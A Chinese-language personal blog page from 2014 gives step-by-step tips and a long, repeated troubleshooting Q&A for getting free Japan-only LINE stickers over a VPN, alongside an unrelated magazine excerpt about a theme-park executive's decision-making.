2014年4月15日星期二

(1943) LINE Characters: Shopping Girls (JP)

這組 1943, 雖然只有 180天, 滿可愛的建議下載, 取得期限只到明天 2014-04-17, 需要安裝 LINE Mall App, 而且要VPN連到日本去, 連進日本後進貼圖小舖就會看到 Shopping Girls 了, 不需要手動輸入 line://shop/detail/1943

VPN連日本, 建議使用 OpenVPN connect 方案(易聯或devilspot).

Android 版 LINE Mall Apk 下載:
載點1: http://goo.gl/32RxHC
載點2: http://1drv.ms/1eODAXA
載點3: http://goo.gl/JtJ2Gm

圖片來源: 林心柔

==============
連去日本, 請順便下載日版 Sally + 日版薑餅人 + 土撥鼠
Sally's School Life

順便下載日本版的跑跑薑餅人, 好短命的薑餅人的只能用90天, 台版的可以用180天說.

土撥鼠下載


到日本/韓國/越南, 請透過 OpenVPN connect. 好連又免費. 到美國請使用 Hotspot Shield VPN.

=====================
Q&A
=====================
Q: 跨區下載貼圖, 我的手機或平板, 需要ROOT 或 JB 嗎?
A: 不需要ROOT, 一般的Android/iPhone/iPad 手機或平板即可, 透過電腦 + Android 模擬器(例如: BlueStacks) 也可以取得貼圖.

Q: 有需要連線到VPN嗎?
A: 完全需要透過VPN連線到其他國家進行下載。

Q: 我VPN都連失敗.
A: 透過 "免費" 的試用帳號連結 FlyVPN時, 因為是免費的所以連線失敗是正常的, 需要多試幾次或在半夜連。FlyVPN連不上去原因有二:
  • 第一:伺服器位置、帳號、密碼其一錯誤.
  • 第二:太多人使用造成壅擠,建議換個時段在連看看.
由於FlyVPN的密碼短時間內不會變更. Android 2.3.x 版的用戶無法儲存 VPN 的密碼, 建議使用 Free VPN Password 這個App, 透過直接貼上存放在剪貼簿裡的密碼, 可以在縮短的連線的時間, 以增加重試的次數, 重試的次數多, 就比較容易連的上, 如果是 Android 4.0 以上的VPN 建議儲存密碼, 一直按"連線" 就可以直接重試.


Q: 用 eMall去申請帳號, 是不是會比較好下載?
A: 用 eMail 去申請的那組日本的VPN主機(49.212.0.54)比較好連上, 幾乎每次一連就可以連上, 所以的確是比較好下載.

Q: 連VPN到國外取得貼圖時是要用Wi-Fi,或是用3G就可以了?
A: 都可以唷~, 不管 3G 或 Wi-Fi 只要能上網就可以.

Q: 一定要移除手機門號綁定?
A: 對!建議移除門號的綁定, 改綁Facebook, 並使用Facebook 登入 LINE 會比較簡單一下. 請參考看看移除LINE電話號碼綁定教學:
http://max-everyday.blogspot.com/2013/04/line-remove-phone-number.html
(說明: 
LINE 帳號要先綁好Email 和 Facebook, 如果有重要的交談記錄, 請先備份, 因為會消失, 曾經下載過的貼圖經在重新登入LINE 後, 用貼圖管理員重新下載即可.)

Q: 備份檔案過大沒辦法寄怎麼辦
A: 
1. 先只備份文字訊息. 
2. 圖片/影片另外到SD Card裡備出來.
圖片檔: /sdcard/Pictures/NAVER_LINE
影片檔: /sdcard/Pictures/NAVER_LINE_MOVIE


Q: 如何確定LINE有沒有綁定門號?
A: 請打開LINE,其他 → 設定 → 我的帳號


Q: 要下載圖案時, 怎麼加LINE的好友啊?
A: 要先 "強制停止" 一下 LINE App, 而且成功VPN連到國外即可加入好友.

Q: "強制關閉" App , 然後點我要的圖, 免費上面寫 "無法選購"(或在下載免費貼圖時無法加入好友).
A: 請先檢查你的帳號是否有綁定電話號碼, 如果你的帳號沒有綁定電話號碼的, 請 "強制關閉" LINE App 後再試一次.

Q: 成功連上國外VPN後, 看不到免費貼圖只看到付費貼圖
A: 請先檢查你的帳號是否有綁定電話號碼, 如果你的帳號沒有綁定電話號碼的, 請 "強制關閉" LINE App 後再試一次.

Q: 成功連上國外VPN後, "強制停止" "清除資料" "uninstall line" 也分別試過了, 還是顯示 "無法選購"(或在下載免費貼圖時無法加入好友)不能取得貼圖. 是那裡出錯?
A: 請先檢查你的帳號是否有綁定電話號碼, 如果你的帳號沒有綁定電話號碼的, 請 "強制關閉" LINE App 後再試一次. 

Q: 已經成功連上國外的VPN, LINE 的帳號也是用eMail 登入, 也強制停止, 還是一樣顯示 "無法選購"(或在下載免費貼圖時無法加入好友), 不能下載貼圖.
A: 請試著關閉 wifi, 手機進入飛安模式後, 然後重新開啟wifi, 再重新連到國外的VPN 一次看看, 有時候系統就是會怪怪的, 也可以試試看重開機. (重開機治百病, 包括台灣高鐵的信號異常).

Q: 如何 "強制停止" LINE 應用程式.
A: Android 平台的話可以在 "應用程式管理" 的地方, 對應用程式做移除或強制停止. iPhone/iPad 的話就是點2下 Home 鍵, 把 LINE App 按 x 關閉即可.

Q: iPhone哪裡可以停止和清除資料
A: iPhone/iPad, 請點2下 Home 鍵, 即可強制關閉 LINE App.

Q: 透過 Windows 電腦, 可以取得 LINE 貼圖嗎?
A: 可以哦, 透過 Windows 設定 VPN 後, 再執行 BlueStacks 或 Android 模擬器即可. 參考看看圖文教學: http://max-everyday.blogspot.com/2013/02/bluestacksline.html

Q: 為何要把LINE強制停止?
A: 因為要讓 LINE 重新和LINE 的伺服器連線, LINE 的主機會依照你目前的 IP Address 來判斷你的LINE帳號屬於那一個國家別. 如果你設了VPN 連到國外, 這時候就可以下載(或購買)到國外的貼圖.

Q: 請問iPhone/iPad怎麼跨國家取貼圖?
A: 參考看看教學:
http://max-everyday.blogspot.tw/2013/04/flyvpn-iphone-ipad-line-sticker.html

Q: iPhone/iPad/iTouch 如何連上VPN?
A: 參考看看教學:
http://max-everyday.blogspot.tw/2013/04/flyvpn-iphone-ipad-line-sticker.html

Q: 為什麼有這麼多貼圖可以抓?
A: 這些貼圖都是LINE在各個國家推出的活動免費圖。

Q: 這樣會導致LINE帳號被封鎖嗎?
A: 不敢保證, 但目前沒有聽說任何人遭到封鎖, 只有部分活動送的貼圖被官方收回去(貼圖顯示已逾期)。

Q: 哪時候會有新的貼圖?
A: 我不是LINE公司,我沒辦法準確地告訴你哪時候會出新貼圖,但是依照目前的週期看來是:
  • 每週二上午10點 (免費圖)
  • 每週四上午10點 (付費圖,但有時會有免費圖)
  • 每週五上午10點 (活動圖、免費圖)

Q: 哪邊可以看到最新的貼圖資訊?
A: 參考看看許願貓的網站
http://www.gpx.idv.tw/line_stic/list.php?price=free

Q: 付費的貼圖可以抓嗎?
A: 可以呀...付錢給LINE就可以抓了 XD

Q: 過期的貼圖還能抓嗎?
A: 沒辦法,如果貼圖過期了不管怎樣都無法取得。

Q: 有些已過期的圖是不是以後都下載不到啊?
A: 貼圖的過期分2種, 一種是取得期限已過期, 過了就無法取得或下載, 另一種過期是針對已取得的貼圖, 使用限期已滿就無法再使用和下載.

Q: 我可以將這些貼圖贈送給朋友嗎?
A: 沒辦法,LINE後來修改了遊戲規則,大多數的免費貼圖將無法跨區贈送, 小部份的例外.

Q: LINE重新安裝原本的貼圖會不見嗎?
A: 只要有綁定Email或Facebook重新登入使用現有用戶登入就不會消失,但登入後必須重新下載, 請打開LINE,其他→設定→貼圖管理員→我的貼圖.

Q: 請問連線到國外下載免費貼圖需要手續費嗎?
A: 理論上都是免費的, VPN服務有些是付費的, 會比較好連, 一般來說用免費(可能需要多連幾次)的即可. 手機/平板或電腦透過ADSL/3G/4G或Wi-Fi連到網路的費用需要自行付擔. 上網的收費很多元, 一般家庭是使用 ADSL/光纖/Cable, 一手機是使用 Wi-Fi/3G/4G.

Q: 請問VPN每一國的帳號都固定的嗎?
A: 如果是自己付費去買的vpn, 就會是固定的, 免費的有些是 vpnc 有些是 vpnu, 有些是要用email 去申請帳號, 有些是安裝app 就可以連不需要帳號.

Q: 用這個不分區下載貼圖臉書是不是比較容易被盜?
A: 理論上是不會被盜。

Q: 日本貼圖要特殊條件是什麼條件嗎?
A: 特殊條件幾乎都是要花錢購買(漫畫或買飲料), 一般的情況下無法免費取得.

Q: 請問安卓一定要4以上嗎= =? 因為我是連線成功 但是到貼圖小鋪那就一片空白 圈圈一直轉 之後熊熊出現說連線錯誤 =_=
A: Android 2.x 的 VPN 連線可能不太穩, 建議使用 Android 4.x 或 iOS 的行動裝置來連 VPN.

Q: 如果line沒綁定,結果之前購買的貼圖不見,有什麼方法可以找回?
A: LINE 一定需要綁定才能使用, 你不是綁手機門號, 就是要綁FB 帳號, 也可能2個都綁, 你可能是綁了FB 之後, 又透過手機門號重新登入 LINE 就會看到貼圖都消失, 這是正常的, 只要 清除 LINE App 資料(或重新安裝), 再透過 FB (或透過輸入 Email+密碼) 登入即可.

Q: 請問攜碼到其他家電信手機號碼不變貼圖會消失嗎?
A: 只要不刪除帳號, 金幣和貼圖不會消失.

Q: Android 4.0(以上的設備) 在新增VPN站台時, 會要求設定"螢幕鎖"(密碼鎖), 要怎麼拿掉"螢幕鎖"?
A: 先到 VPN 裡, 把所有新增的VPN站台都刪除, 再回來"設定" - "安全性" - "螢幕安全性" 的地方, 就可以設為 "無" (無鎖定).

Q: OpenVPN Connect 無法點選 "我信任此應用程式".

A: 藍色光濾波器關起來就可以點,我也是醬,關了就可以點.

=====================
  • 附註 1: 你的LINE 一定要綁定 Email, 不然之前下載的貼圖會消失. 請點選 "設定電子郵件帳號" 進行設定.
  • 附註 2: LINE App 進行 "重新安裝" 或 "清除資料", 會讓已經下載到手機裡的貼圖暫時被清空, 請點選 "貼圖管理員" 進行重新下載.
  • 附註 3: 已經下載的貼圖, 如果你升級為新的 LINE 版本或是你改用其他平台時(Android 改用 iPhone), LINE貼圖一樣可以繼續使用.
  • 附註 4: 現在Android/iOS 平台每跨一次國家(例如: 從泰國切換到日本) 之前的貼圖和交談記錄不會被清除, 只需要強制停止 LINE App 即可.
====================
請先綁定一組 Email:

請先綁定 Facebook 帳號


點選 "貼圖管理員" - "我的貼圖", 重新下載之前取得的貼圖.

=====================
相關網頁:

(579) Thomas (jp)

我昨天連去日本下載日本版的 Sally's School Life 和 跑跑薑餅人時, "貼圖小舖" 裡的 "活動" 分頁, 拉到最下面也有看到編號579貼圖的土撥鼠(Thomas, 無使用期限, line://shop/detail/597).

VPN連日本, 建議使用 OpenVPN connect 方案(易聯或devilspot).

圖片來源: 林心柔

先來看看 Au 土撥鼠的貼圖有那些吧:
Au 土撥鼠的貼圖

Au 土撥鼠的貼圖


Sally's School Life

順便下載日本版的跑跑薑餅人, 好短命的薑餅人的只能用90天, 台版的可以用180天說.


到日本/韓國/越南, 請透過 OpenVPN connect. 好連又免費. 到美國請使用 Hotspot Shield VPN.

=====================
Q&A
=====================
Q: 跨區下載貼圖, 我的手機或平板, 需要ROOT 或 JB 嗎?
A: 不需要ROOT, 一般的Android/iPhone/iPad 手機或平板即可, 透過電腦 + Android 模擬器(例如: BlueStacks) 也可以取得貼圖.

Q: 有需要連線到VPN嗎?
A: 完全需要透過VPN連線到其他國家進行下載。

Q: 我VPN都連失敗.
A: 透過 "免費" 的試用帳號連結 FlyVPN時, 因為是免費的所以連線失敗是正常的, 需要多試幾次或在半夜連。FlyVPN連不上去原因有二:
  • 第一:伺服器位置、帳號、密碼其一錯誤.
  • 第二:太多人使用造成壅擠,建議換個時段在連看看.
由於FlyVPN的密碼短時間內不會變更. Android 2.3.x 版的用戶無法儲存 VPN 的密碼, 建議使用 Free VPN Password 這個App, 透過直接貼上存放在剪貼簿裡的密碼, 可以在縮短的連線的時間, 以增加重試的次數, 重試的次數多, 就比較容易連的上, 如果是 Android 4.0 以上的VPN 建議儲存密碼, 一直按"連線" 就可以直接重試.


Q: 用 eMall去申請帳號, 是不是會比較好下載?
A: 用 eMail 去申請的那組日本的VPN主機(49.212.0.54)比較好連上, 幾乎每次一連就可以連上, 所以的確是比較好下載.

Q: 連VPN到國外取得貼圖時是要用Wi-Fi,或是用3G就可以了?
A: 都可以唷~, 不管 3G 或 Wi-Fi 只要能上網就可以.

Q: 一定要移除手機門號綁定?
A: 對!建議移除門號的綁定, 改綁Facebook, 並使用Facebook 登入 LINE 會比較簡單一下. 請參考看看移除LINE電話號碼綁定教學:
http://max-everyday.blogspot.com/2013/04/line-remove-phone-number.html
(說明: 
LINE 帳號要先綁好Email 和 Facebook, 如果有重要的交談記錄, 請先備份, 因為會消失, 曾經下載過的貼圖經在重新登入LINE 後, 用貼圖管理員重新下載即可.)

Q: 備份檔案過大沒辦法寄怎麼辦
A: 
1. 先只備份文字訊息. 
2. 圖片/影片另外到SD Card裡備出來.
圖片檔: /sdcard/Pictures/NAVER_LINE
影片檔: /sdcard/Pictures/NAVER_LINE_MOVIE


Q: 如何確定LINE有沒有綁定門號?
A: 請打開LINE,其他 → 設定 → 我的帳號


Q: 要下載圖案時, 怎麼加LINE的好友啊?
A: 要先 "強制停止" 一下 LINE App, 而且成功VPN連到國外即可加入好友.

Q: "強制關閉" App , 然後點我要的圖, 免費上面寫 "無法選購"(或在下載免費貼圖時無法加入好友).
A: 請先檢查你的帳號是否有綁定電話號碼, 如果你的帳號沒有綁定電話號碼的, 請 "強制關閉" LINE App 後再試一次.

Q: 成功連上國外VPN後, 看不到免費貼圖只看到付費貼圖
A: 請先檢查你的帳號是否有綁定電話號碼, 如果你的帳號沒有綁定電話號碼的, 請 "強制關閉" LINE App 後再試一次.

Q: 成功連上國外VPN後, "強制停止" "清除資料" "uninstall line" 也分別試過了, 還是顯示 "無法選購"(或在下載免費貼圖時無法加入好友)不能取得貼圖. 是那裡出錯?
A: 請先檢查你的帳號是否有綁定電話號碼, 如果你的帳號沒有綁定電話號碼的, 請 "強制關閉" LINE App 後再試一次. 

Q: 已經成功連上國外的VPN, LINE 的帳號也是用eMail 登入, 也強制停止, 還是一樣顯示 "無法選購"(或在下載免費貼圖時無法加入好友), 不能下載貼圖.
A: 請試著關閉 wifi, 手機進入飛安模式後, 然後重新開啟wifi, 再重新連到國外的VPN 一次看看, 有時候系統就是會怪怪的, 也可以試試看重開機. (重開機治百病, 包括台灣高鐵的信號異常).

Q: 如何 "強制停止" LINE 應用程式.
A: Android 平台的話可以在 "應用程式管理" 的地方, 對應用程式做移除或強制停止. iPhone/iPad 的話就是點2下 Home 鍵, 把 LINE App 按 x 關閉即可.

Q: iPhone哪裡可以停止和清除資料
A: iPhone/iPad, 請點2下 Home 鍵, 即可強制關閉 LINE App.

Q: 透過 Windows 電腦, 可以取得 LINE 貼圖嗎?
A: 可以哦, 透過 Windows 設定 VPN 後, 再執行 BlueStacks 或 Android 模擬器即可. 參考看看圖文教學: http://max-everyday.blogspot.com/2013/02/bluestacksline.html

Q: 為何要把LINE強制停止?
A: 因為要讓 LINE 重新和LINE 的伺服器連線, LINE 的主機會依照你目前的 IP Address 來判斷你的LINE帳號屬於那一個國家別. 如果你設了VPN 連到國外, 這時候就可以下載(或購買)到國外的貼圖.

Q: 請問iPhone/iPad怎麼跨國家取貼圖?
A: 參考看看教學:
http://max-everyday.blogspot.tw/2013/04/flyvpn-iphone-ipad-line-sticker.html

Q: iPhone/iPad/iTouch 如何連上VPN?
A: 參考看看教學:
http://max-everyday.blogspot.tw/2013/04/flyvpn-iphone-ipad-line-sticker.html

Q: 為什麼有這麼多貼圖可以抓?
A: 這些貼圖都是LINE在各個國家推出的活動免費圖。

Q: 這樣會導致LINE帳號被封鎖嗎?
A: 不敢保證, 但目前沒有聽說任何人遭到封鎖, 只有部分活動送的貼圖被官方收回去(貼圖顯示已逾期)。

Q: 哪時候會有新的貼圖?
A: 我不是LINE公司,我沒辦法準確地告訴你哪時候會出新貼圖,但是依照目前的週期看來是:
  • 每週二上午10點 (免費圖)
  • 每週四上午10點 (付費圖,但有時會有免費圖)
  • 每週五上午10點 (活動圖、免費圖)

Q: 哪邊可以看到最新的貼圖資訊?
A: 參考看看許願貓的網站
http://www.gpx.idv.tw/line_stic/list.php?price=free

Q: 付費的貼圖可以抓嗎?
A: 可以呀...付錢給LINE就可以抓了 XD

Q: 過期的貼圖還能抓嗎?
A: 沒辦法,如果貼圖過期了不管怎樣都無法取得。

Q: 有些已過期的圖是不是以後都下載不到啊?
A: 貼圖的過期分2種, 一種是取得期限已過期, 過了就無法取得或下載, 另一種過期是針對已取得的貼圖, 使用限期已滿就無法再使用和下載.

Q: 我可以將這些貼圖贈送給朋友嗎?
A: 沒辦法,LINE後來修改了遊戲規則,大多數的免費貼圖將無法跨區贈送, 小部份的例外.

Q: LINE重新安裝原本的貼圖會不見嗎?
A: 只要有綁定Email或Facebook重新登入使用現有用戶登入就不會消失,但登入後必須重新下載, 請打開LINE,其他→設定→貼圖管理員→我的貼圖.

Q: 請問連線到國外下載免費貼圖需要手續費嗎?
A: 理論上都是免費的, VPN服務有些是付費的, 會比較好連, 一般來說用免費(可能需要多連幾次)的即可. 手機/平板或電腦透過ADSL/3G/4G或Wi-Fi連到網路的費用需要自行付擔. 上網的收費很多元, 一般家庭是使用 ADSL/光纖/Cable, 一手機是使用 Wi-Fi/3G/4G.

Q: 請問VPN每一國的帳號都固定的嗎?
A: 如果是自己付費去買的vpn, 就會是固定的, 免費的有些是 vpnc 有些是 vpnu, 有些是要用email 去申請帳號, 有些是安裝app 就可以連不需要帳號.

Q: 用這個不分區下載貼圖臉書是不是比較容易被盜?
A: 理論上是不會被盜。

Q: 日本貼圖要特殊條件是什麼條件嗎?
A: 特殊條件幾乎都是要花錢購買(漫畫或買飲料), 一般的情況下無法免費取得.

Q: 請問安卓一定要4以上嗎= =? 因為我是連線成功 但是到貼圖小鋪那就一片空白 圈圈一直轉 之後熊熊出現說連線錯誤 =_=
A: Android 2.x 的 VPN 連線可能不太穩, 建議使用 Android 4.x 或 iOS 的行動裝置來連 VPN.

Q: 如果line沒綁定,結果之前購買的貼圖不見,有什麼方法可以找回?
A: LINE 一定需要綁定才能使用, 你不是綁手機門號, 就是要綁FB 帳號, 也可能2個都綁, 你可能是綁了FB 之後, 又透過手機門號重新登入 LINE 就會看到貼圖都消失, 這是正常的, 只要 清除 LINE App 資料(或重新安裝), 再透過 FB (或透過輸入 Email+密碼) 登入即可.

Q: 請問攜碼到其他家電信手機號碼不變貼圖會消失嗎?
A: 只要不刪除帳號, 金幣和貼圖不會消失.

Q: Android 4.0(以上的設備) 在新增VPN站台時, 會要求設定"螢幕鎖"(密碼鎖), 要怎麼拿掉"螢幕鎖"?
A: 先到 VPN 裡, 把所有新增的VPN站台都刪除, 再回來"設定" - "安全性" - "螢幕安全性" 的地方, 就可以設為 "無" (無鎖定).

Q: OpenVPN Connect 無法點選 "我信任此應用程式".

A: 藍色光濾波器關起來就可以點,我也是醬,關了就可以點.

=====================
  • 附註 1: 你的LINE 一定要綁定 Email, 不然之前下載的貼圖會消失. 請點選 "設定電子郵件帳號" 進行設定.
  • 附註 2: LINE App 進行 "重新安裝" 或 "清除資料", 會讓已經下載到手機裡的貼圖暫時被清空, 請點選 "貼圖管理員" 進行重新下載.
  • 附註 3: 已經下載的貼圖, 如果你升級為新的 LINE 版本或是你改用其他平台時(Android 改用 iPhone), LINE貼圖一樣可以繼續使用.
  • 附註 4: 現在Android/iOS 平台每跨一次國家(例如: 從泰國切換到日本) 之前的貼圖和交談記錄不會被清除, 只需要強制停止 LINE App 即可.
====================
請先綁定一組 Email:

請先綁定 Facebook 帳號


點選 "貼圖管理員" - "我的貼圖", 重新下載之前取得的貼圖.

=====================
相關網頁:

The Question Behind The Question (QBQ) 問題背後的問題

滿有趣的一個人, 他的眼光滿精準的, 也想的比別人多, 所以對別人提的問題都有解決方案. 這篇文章的重要在:
(1) 缺點是有辦法解決的,但賣點卻是無可取代的!
(2) 讀真理大學畢業一樣可以出來賺大錢.



像這種提問題, 思考問題的書市面上還滿多的, 例如:



==========
楊濟華
出生:1955年
現職:義大開發、義大國際副董事長兼總經理
經歷:泛僑公司總經理、義大開發公司總經理
學歷:真理大學企管系

==========
文章來源: 金周刊
http://www.businesstoday.com.tw/
==========
一度被業界看衰的義大世界,營運以來卻不斷寫下奇蹟,幕後推手正是楊濟華。這位義大集團董事長林義守最仰賴的大將,靠著縝密的自問力,讓老闆的質疑變認同,也總能先一步想到客戶會撂下什麼難題,讓所有的挑戰順利化解。

「這樣會害死大家的!你知不知道?」二○○八年,正當整個義大世界的主題樂園、飯店、OUTLET MALL都已經接近完工時,掌管遊樂園和購物中心的義大開發副董事長楊濟華卻冷不防地丟出一項建議案:他打算把原先計畫架設在主題樂園內的「摩天輪」挪至六百二十七公尺之遙的MALL頂樓。此話一出,立刻讓所有與會的主管傻眼,場面先是凝結,隨之而來便是一句句質詢。

「你有沒有想過,MALL在飯店對面,摩天輪架在那兒,要我的房客全被看光光啊?晚上對著摩天輪的光,又吵又亮,誰睡得著!」

義大皇冠(現更名為義大皇家)酒店的主管們質「副董,摩天輪是要賣票的,也是樂園一票到底的設施之一,更會是熱門遊具,沒有理由不放在主題樂園裡?而且距離那麼遠,會雙輸的!」

甚至有人狠狠地撂下:「你這個沒待過樂園、沒開過百貨的門外漢,憑什麼來亂?」

這些尖銳的問題,像是早已在楊濟華腦中翻騰過幾百遍,「你們想問的,我都問過自己。我敢提,自然就有解方!」他氣定神閒地說:「全台灣這麼多飯店,人家何必要跑到我們這化外之地來住宿?除非我們夠特別!未來,義大皇家酒店將會是全亞洲唯一面對絢麗摩天輪的飯店。至於重隱私的、怕光的,可以拉窗簾;怕吵的,有隔音窗。缺點是有辦法解決的,但賣點卻是無可取代的!

與會人員說:「那對樂園和MALL有什麼好處?」

楊濟華話接得有條不紊:「我的考慮不比你們少!既然摩天輪是必玩的,遊客都不遠千里而來了,不會在乎多走幾百公尺,但這卻會讓樂園人潮非得走到購物中心光顧不可,這是雙輸還是雙贏?」

仍有人不服氣:「這一旦定案了,可不是能說拆就拆的,你得想清楚!」

但幾年後,他的預言卻一一實現!摩天輪自營運以來,不但從未接過一位遊客或是住客嫌吵、嫌亮、嫌遠的投訴,反倒是受惠於這項特殊的景觀,飯店面對摩天輪的一二七個房間永遠是最貴、最早賣光的,「而每年一百五十萬的搭乘人次,更為MALL多帶來了可觀的消費人潮。」

縝密的思索 打造樂園、飯店與購物中心三贏

楊濟華,這位義大集團董事長林義守十三年前三顧茅廬請來的專業經理人,在義大集團中,他一人執掌了主題樂園、購物中心、建設開發三個重大事業,旗下更有三千多名員工、三十八位處長、協理、經理級的高階主管,甚至不乏留學各地的博碩士級專業人才。

而他所主導的義大遊樂世界,自開幕後已連續三年蟬聯入園人次、營收和滿意度的三冠王,門票收入更足足比第二名的劍湖山世界多出了五成。至於MALL,在去年百貨業一片蕭條之際,這位百貨大外行卻逆勢締造了四五%的成長率。所以去年集團的尾牙宴時,當所有的記者一擁而上,詢問著:「義大奇蹟是憑什麼締造的?」只見楊濟華笑著說:「或許我比你們更常問『為什麼?』『憑什麼?』吧!」

的確,在競爭激烈的職場和商場,每一個決策就像打一場仗,一次次質問有如致命的交鋒,接得好,化險為夷,甚至旗開得勝;沒接好,動輒粉身碎骨!

2014年4月14日星期一

(2105) Sally's School Life (JP)

這組 2105, 雖然只有 180天, 滿可愛的建議下載, 需要安裝 LINE Q App, 而且要VPN連到日本去, 連進日本後進貼圖小舖就會看到 Sally 了, 不需要手動輸入 line://shop/detail/2105, VPN連日本, 建議使用 OpenVPN connect 方案(易聯或devilspot).

(Androd) LINE Manga 2.2.1 Apk 下載:
(載點1) http://pan.baidu.com/s/1hqHsOAw
(載點2) http://android.app-master.com.tw/app/soft/info/1662


順便下載日本版的跑跑薑餅人, 好短命的薑餅人的只能用90天, 台版的可以用180天說.


到日本/韓國/越南, 請透過 OpenVPN connect. 好連又免費. 到美國請使用 Hotspot Shield VPN.

=====================
Q&A
=====================
Q: 跨區下載貼圖, 我的手機或平板, 需要ROOT 或 JB 嗎?
A: 不需要ROOT, 一般的Android/iPhone/iPad 手機或平板即可, 透過電腦 + Android 模擬器(例如: BlueStacks) 也可以取得貼圖.

Q: 有需要連線到VPN嗎?
A: 完全需要透過VPN連線到其他國家進行下載。

Q: 我VPN都連失敗.
A: 透過 "免費" 的試用帳號連結 FlyVPN時, 因為是免費的所以連線失敗是正常的, 需要多試幾次或在半夜連。FlyVPN連不上去原因有二:
  • 第一:伺服器位置、帳號、密碼其一錯誤.
  • 第二:太多人使用造成壅擠,建議換個時段在連看看.
由於FlyVPN的密碼短時間內不會變更. Android 2.3.x 版的用戶無法儲存 VPN 的密碼, 建議使用 Free VPN Password 這個App, 透過直接貼上存放在剪貼簿裡的密碼, 可以在縮短的連線的時間, 以增加重試的次數, 重試的次數多, 就比較容易連的上, 如果是 Android 4.0 以上的VPN 建議儲存密碼, 一直按"連線" 就可以直接重試.


Q: 用 eMall去申請帳號, 是不是會比較好下載?
A: 用 eMail 去申請的那組日本的VPN主機(49.212.0.54)比較好連上, 幾乎每次一連就可以連上, 所以的確是比較好下載.

Q: 連VPN到國外取得貼圖時是要用Wi-Fi,或是用3G就可以了?
A: 都可以唷~, 不管 3G 或 Wi-Fi 只要能上網就可以.

Q: 一定要移除手機門號綁定?
A: 對!建議移除門號的綁定, 改綁Facebook, 並使用Facebook 登入 LINE 會比較簡單一下. 請參考看看移除LINE電話號碼綁定教學:
http://max-everyday.blogspot.com/2013/04/line-remove-phone-number.html
(說明: 
LINE 帳號要先綁好Email 和 Facebook, 如果有重要的交談記錄, 請先備份, 因為會消失, 曾經下載過的貼圖經在重新登入LINE 後, 用貼圖管理員重新下載即可.)

Q: 備份檔案過大沒辦法寄怎麼辦
A: 
1. 先只備份文字訊息. 
2. 圖片/影片另外到SD Card裡備出來.
圖片檔: /sdcard/Pictures/NAVER_LINE
影片檔: /sdcard/Pictures/NAVER_LINE_MOVIE


Q: 如何確定LINE有沒有綁定門號?
A: 請打開LINE,其他 → 設定 → 我的帳號


Q: 要下載圖案時, 怎麼加LINE的好友啊?
A: 要先 "強制停止" 一下 LINE App, 而且成功VPN連到國外即可加入好友.

Q: "強制關閉" App , 然後點我要的圖, 免費上面寫 "無法選購"(或在下載免費貼圖時無法加入好友).
A: 請先檢查你的帳號是否有綁定電話號碼, 如果你的帳號沒有綁定電話號碼的, 請 "強制關閉" LINE App 後再試一次.

Q: 成功連上國外VPN後, 看不到免費貼圖只看到付費貼圖
A: 請先檢查你的帳號是否有綁定電話號碼, 如果你的帳號沒有綁定電話號碼的, 請 "強制關閉" LINE App 後再試一次.

Q: 成功連上國外VPN後, "強制停止" "清除資料" "uninstall line" 也分別試過了, 還是顯示 "無法選購"(或在下載免費貼圖時無法加入好友)不能取得貼圖. 是那裡出錯?
A: 請先檢查你的帳號是否有綁定電話號碼, 如果你的帳號沒有綁定電話號碼的, 請 "強制關閉" LINE App 後再試一次. 

Q: 已經成功連上國外的VPN, LINE 的帳號也是用eMail 登入, 也強制停止, 還是一樣顯示 "無法選購"(或在下載免費貼圖時無法加入好友), 不能下載貼圖.
A: 請試著關閉 wifi, 手機進入飛安模式後, 然後重新開啟wifi, 再重新連到國外的VPN 一次看看, 有時候系統就是會怪怪的, 也可以試試看重開機. (重開機治百病, 包括台灣高鐵的信號異常).

Q: 如何 "強制停止" LINE 應用程式.
A: Android 平台的話可以在 "應用程式管理" 的地方, 對應用程式做移除或強制停止. iPhone/iPad 的話就是點2下 Home 鍵, 把 LINE App 按 x 關閉即可.

Q: iPhone哪裡可以停止和清除資料
A: iPhone/iPad, 請點2下 Home 鍵, 即可強制關閉 LINE App.

Q: 透過 Windows 電腦, 可以取得 LINE 貼圖嗎?
A: 可以哦, 透過 Windows 設定 VPN 後, 再執行 BlueStacks 或 Android 模擬器即可. 參考看看圖文教學: http://max-everyday.blogspot.com/2013/02/bluestacksline.html

Q: 為何要把LINE強制停止?
A: 因為要讓 LINE 重新和LINE 的伺服器連線, LINE 的主機會依照你目前的 IP Address 來判斷你的LINE帳號屬於那一個國家別. 如果你設了VPN 連到國外, 這時候就可以下載(或購買)到國外的貼圖.

Q: 請問iPhone/iPad怎麼跨國家取貼圖?
A: 參考看看教學:
http://max-everyday.blogspot.tw/2013/04/flyvpn-iphone-ipad-line-sticker.html

Q: iPhone/iPad/iTouch 如何連上VPN?
A: 參考看看教學:
http://max-everyday.blogspot.tw/2013/04/flyvpn-iphone-ipad-line-sticker.html

Q: 為什麼有這麼多貼圖可以抓?
A: 這些貼圖都是LINE在各個國家推出的活動免費圖。

Q: 這樣會導致LINE帳號被封鎖嗎?
A: 不敢保證, 但目前沒有聽說任何人遭到封鎖, 只有部分活動送的貼圖被官方收回去(貼圖顯示已逾期)。

Q: 哪時候會有新的貼圖?
A: 我不是LINE公司,我沒辦法準確地告訴你哪時候會出新貼圖,但是依照目前的週期看來是:
  • 每週二上午10點 (免費圖)
  • 每週四上午10點 (付費圖,但有時會有免費圖)
  • 每週五上午10點 (活動圖、免費圖)

Q: 哪邊可以看到最新的貼圖資訊?
A: 參考看看許願貓的網站
http://www.gpx.idv.tw/line_stic/list.php?price=free

Q: 付費的貼圖可以抓嗎?
A: 可以呀...付錢給LINE就可以抓了 XD

Q: 過期的貼圖還能抓嗎?
A: 沒辦法,如果貼圖過期了不管怎樣都無法取得。

Q: 有些已過期的圖是不是以後都下載不到啊?
A: 貼圖的過期分2種, 一種是取得期限已過期, 過了就無法取得或下載, 另一種過期是針對已取得的貼圖, 使用限期已滿就無法再使用和下載.

Q: 我可以將這些貼圖贈送給朋友嗎?
A: 沒辦法,LINE後來修改了遊戲規則,大多數的免費貼圖將無法跨區贈送, 小部份的例外.

Q: LINE重新安裝原本的貼圖會不見嗎?
A: 只要有綁定Email或Facebook重新登入使用現有用戶登入就不會消失,但登入後必須重新下載, 請打開LINE,其他→設定→貼圖管理員→我的貼圖.

Q: 請問連線到國外下載免費貼圖需要手續費嗎?
A: 理論上都是免費的, VPN服務有些是付費的, 會比較好連, 一般來說用免費(可能需要多連幾次)的即可. 手機/平板或電腦透過ADSL/3G/4G或Wi-Fi連到網路的費用需要自行付擔. 上網的收費很多元, 一般家庭是使用 ADSL/光纖/Cable, 一手機是使用 Wi-Fi/3G/4G.

Q: 請問VPN每一國的帳號都固定的嗎?
